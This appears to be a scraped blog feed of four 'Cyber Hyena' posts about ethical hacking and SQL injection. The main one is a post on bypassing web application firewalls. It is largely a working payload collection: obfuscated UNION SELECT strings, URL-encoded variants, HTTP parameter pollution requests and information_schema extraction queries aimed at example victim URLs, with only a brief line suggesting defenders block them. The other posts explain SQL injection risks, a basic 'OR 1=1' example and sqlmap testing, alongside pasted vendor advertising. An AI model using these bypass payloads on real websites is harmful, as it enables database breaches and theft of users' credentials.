The post ethical hacker course online free more than 15 hours appeared first on Cyber Hyena.
]]>
0
0
today we will talk about ethical hacker course online and free this course is full course in one video on YouTube by the cyber mentor Learn network penetration testing / ethical hacking in this full tutorial course for beginners.
This course teaches everything you need to know to get started with ethical hacking and penetration testing. You will learn the practical skills necessary to work in the field. Throughout the course, we will develop our own Active Directory lab in Windows, make it vulnerable, hack it, and patch it. We’ll cover the red and blue sides. We’ll also cover some of the boring stuff like report writing :). This course was originally live streamed weekly on Twitch and built from lessons learned in the previous week.
Course created by The Cyber Mentor. Check out his YouTube channel: here
the best in this ethical hacker course is free and simple and easy to learn the cyber mentor give you the information in easy way also you will learn allot of things in this 15 hours course
you can also see our php free course
Certified Ethical Hacker (CEH) is a qualification obtained by demonstrating knowledge of assessing the security of computer systems by looking for weaknesses and vulnerabilities in target systems, using the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system. This knowledge is assessed by answering multiple choice questions regarding various ethical hacking techniques and tools. The code for the CEH exam is 312-50. This certification has now been made a baseline with a progression to the CEH (Practical), launched in March 2018, a test of penetration testing skills in a lab environment where the candidate must demonstrate the ability to apply techniques and use penetration testing tools to compromise various simulated systems within a virtual environment.
The post ethical hacker course online free more than 15 hours appeared first on Cyber Hyena.
]]>The post SQL injection bypass WAF Web application firewall appeared first on Cyber Hyena.
]]>
0
0
SQL injection bypass WAF is one of the most dangerous techniques we will show you today how hackers bypass your waf and how to fix it
most of WAF’s block usual SQLI commands and orders for example if you use order by 1– or union select the WAF well block you and that good for now
what hackers do is bypass the simple WAF by adding some letters and codes and that actually work !
for example to do union select they use /*!5000UnIoN*!/+/*!5000SeLeCt*!/ and this order will bypass the WAF easily !
Bypassing WAF: SQL Injection – Normalization Method Example Number (1) of a vulnerability in the function of request Normalization. • The following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request
will be successfully performed /?id=1/*union*/union/*select*/select+1,2,3/*
• After being processed by WAF, the request will become
index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source. Example Number (2) of a vulnerability in the function of request Normalization. • Similarly, the following request doesn’t allow anyone to conduct an attack
/?id=1+union+select+1,2,3/*
• If there is a corresponding vulnerability in the WAF, this request will be successfully performed
/?id=1+un/**/ion+sel/**/ect+1,2,3--
• The SQL request will become
SELECT * from table where id =1 union select 1,2,3--
Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).
The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).
‘Using HTTP Parameter Pollution (HPP)’
• The following request doesn’t allow anyone to conduct an attack
/?id=1;select+1,2,3+from+users+where+id=1--
• This request will be successfully performed using HPP
/?id=1;select+1&id=2,3+from+users+where+id=1--
and here is some bypass string
/*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ concat(0x223e,@@version) concat(0x273e27,version(),0x3c212d2d) concat(0x223e3c62723e,version(),0x3c696d67207372633d22) concat(0x223e,@@version,0x3c696d67207372633d22) concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e) concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22) concat(‘’,@@version,’’) /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+
Union Select by PASS with Url Encoded Method: %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7 Illegal mix of Collations ByPass Method : unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
and the other methods will be replaced keywords ad we mentioned above
Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.
http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
Some case SQL keyword was filtered out and replaced with whitespace. So we can use “%0b” to bypass.
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
what to you need to do is to add the list of strings that showed in this aritcles to your waf
or contact your web security provider to avoid those strings and avoide SQL injection bypass WAF
a
and read more about web security hereThe post SQL injection bypass WAF Web application firewall appeared first on Cyber Hyena.
]]>The post Understanding how SQL injection can be so dangerous appeared first on Cyber Hyena.
]]>
0
0
in general SQL injection is a code injection technique that might destroy your database. in other way the attackers can have access to all your database information including your email your password your phone number and all your website member details !
gaining access to your database is a big problem all your data will be leaked and hacked also your website members, imagine a big website with big members number hacked ? lets say you have a membership in a website and that website have SQL injection exploit and the hackers attack it
the hackers will have your email and password your phone number and all data you entered in that website !! lets say you use the same password of your facebook account on that password , the hackers will try login to your account and booom all privacy gone , sound scary right ?
lets go bigger than that , country like Thailand have low security in websites , i see a big website and forums in Thailand have SQL injection ,one of million websites have at least from 3000 to 100,000 member in this case hackers exploit SQL injection and collect the data , data of million accounts emails and password’s
what hackers do with that amount of data ? they send scams to the leaked emails , scam is a fake email you got , that email says for example you should update your paypal account , and that email are programmed to link you to a page look exactly like paypal page but instead of sending your email and password to paypal that login page send the information’s for the hackers
other way they have software’s for trying your login email and password on social media websites like facebook twitter and others also google , in that case if you use the same password for all websites you will be hacked !
also some hackers sell that huge amount of data to dark E marketing companies so your email will be of full of scam and false sales and other scam emails
in other way if there is s SQL injection in a website on a server , the hackers will have the admin and password of that website , and try to upload a programmed tool called shell or backdoor to the server !, after that they try to gain the root privilege of the server and thats mean all the websites on that server is hacked
lets say you have secured website but you use shared host with another websites and some of them have SQL injection your website will be able to be hacked !
some other techniques that hacker use to hack a website using SQL injection is to inject that backdoor directly using the database orders AND no NEED to your admin panel and your username and password
Understanding how SQL injection can be so dangerous is what we need to consider
if you want to know if you have that exploit here
The post Understanding how SQL injection can be so dangerous appeared first on Cyber Hyena.
]]>The post understanding SQL injection test your site and fix solutions appeared first on Cyber Hyena.
]]>
0
0
SQL injection is a code injection technique that might destroy your database. and its is one of the most common web hacking techniques and it is the placement of malicious code in SQL statements, via web page input.
SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.
Look at the following example which creates a SELECT statement by adding a variable (txtUserId) to a select string. The variable is fetched from user input (getRequestString):
Example
txtUserId = getRequestString(“UserId”);
txtSQL = “SELECT * FROM Users WHERE UserId = ” + txtUserId;
The rest of this chapter describes the potential dangers of using user input in SQL statements.
SQL Injection Based on 1=1 is Always True
Look at the example above again. The original purpose of the code was to create an SQL statement to select a user, with a given user id.
If there is nothing to prevent a user from entering “wrong” input, the user can enter some “smart” input like this:
UserId:
Then, the SQL statement will look like this:
SELECT * FROM Users WHERE UserId = 105 OR 1=1;
The SQL above is valid and will return ALL rows from the “Users” table, since OR 1=1 is always TRUE.
Does the example above look dangerous? What if the “Users” table contains names and passwords?
The SQL statement above is much the same as this:
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;
A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into the input field.
lets talk simply , if you not a professional you can know if you have this SQL injection exploit in your website easily using several ways first of all if your site have id’s in the link ,for example if you have like this url in your website www.yoursite.com/news.php?id=1 you can do a quick test just add this Apostrophe ‘ to be like this www.yoursite.com/news.php?id=1’
if you have SQL injection exploit errors will show up or some elements of the website will disappear , IMPORTANT you should know that is just a quick test if you see no errors and nothing disappear that doesn’t mean that you don’t have the exploits to make sure there is another pro way
SQLMAP way
sqlmap is tool programmed using python and easy to use by amateurs you can download the script from the official SQLmap website
you should test your site on localhost not on your server to avoid getting banned by the host provider
after you check if you have a SQL injection exploit in your site how to fix it ?
SQL injection protection: conclusion
Prevention techniques such as input validation, parametrized queries, stored procedures and escaping work well with varying attack vectors. However, because of the large variation in the pattern of SQL injection attacks they are often unable to protect databases.
Therefore, if you want to cover all bases, you should apply the abovementioned strategies in combination with a trusted WAF. The primary WAF benefit is that it provides protection for custom web applications that would otherwise go unprotected.
WAF technology:
- without having to change the application itself.
If you need more detailed control, higher security and lower latency, then the Positive Technologies WAF can help.
- PT WAF does not interfere with the performance of your virtual infrastructure.
- We offer innovative solutions to mitigating SQL injections, XSS, DDoS, zero-day attacks (to name a few) and the threat triaging is done in an automated manner.
- There are multiple deployment options, including cloud, hardware or virtual appliance.
- Our WAF solution also helps you cost-effectively satisfy PCI requirements.
When it comes to configuring, PT WAF takes the time to get to the heart of what matters – because it’s our mission to ensure that our clients’ businesses are never interrupted.
As a leading provider of security solutions, we are committed to continuous improvement, research and practical penetration testing. Test your website today with PT BlackBox Scanner: it’s simple, accurate and free.
also you need to fix it in programming way because some WAF are able to bypass !!
if you don’t have that much Experience you can ask any security professional for further help
The post understanding SQL injection test your site and fix solutions appeared first on Cyber Hyena.
]]>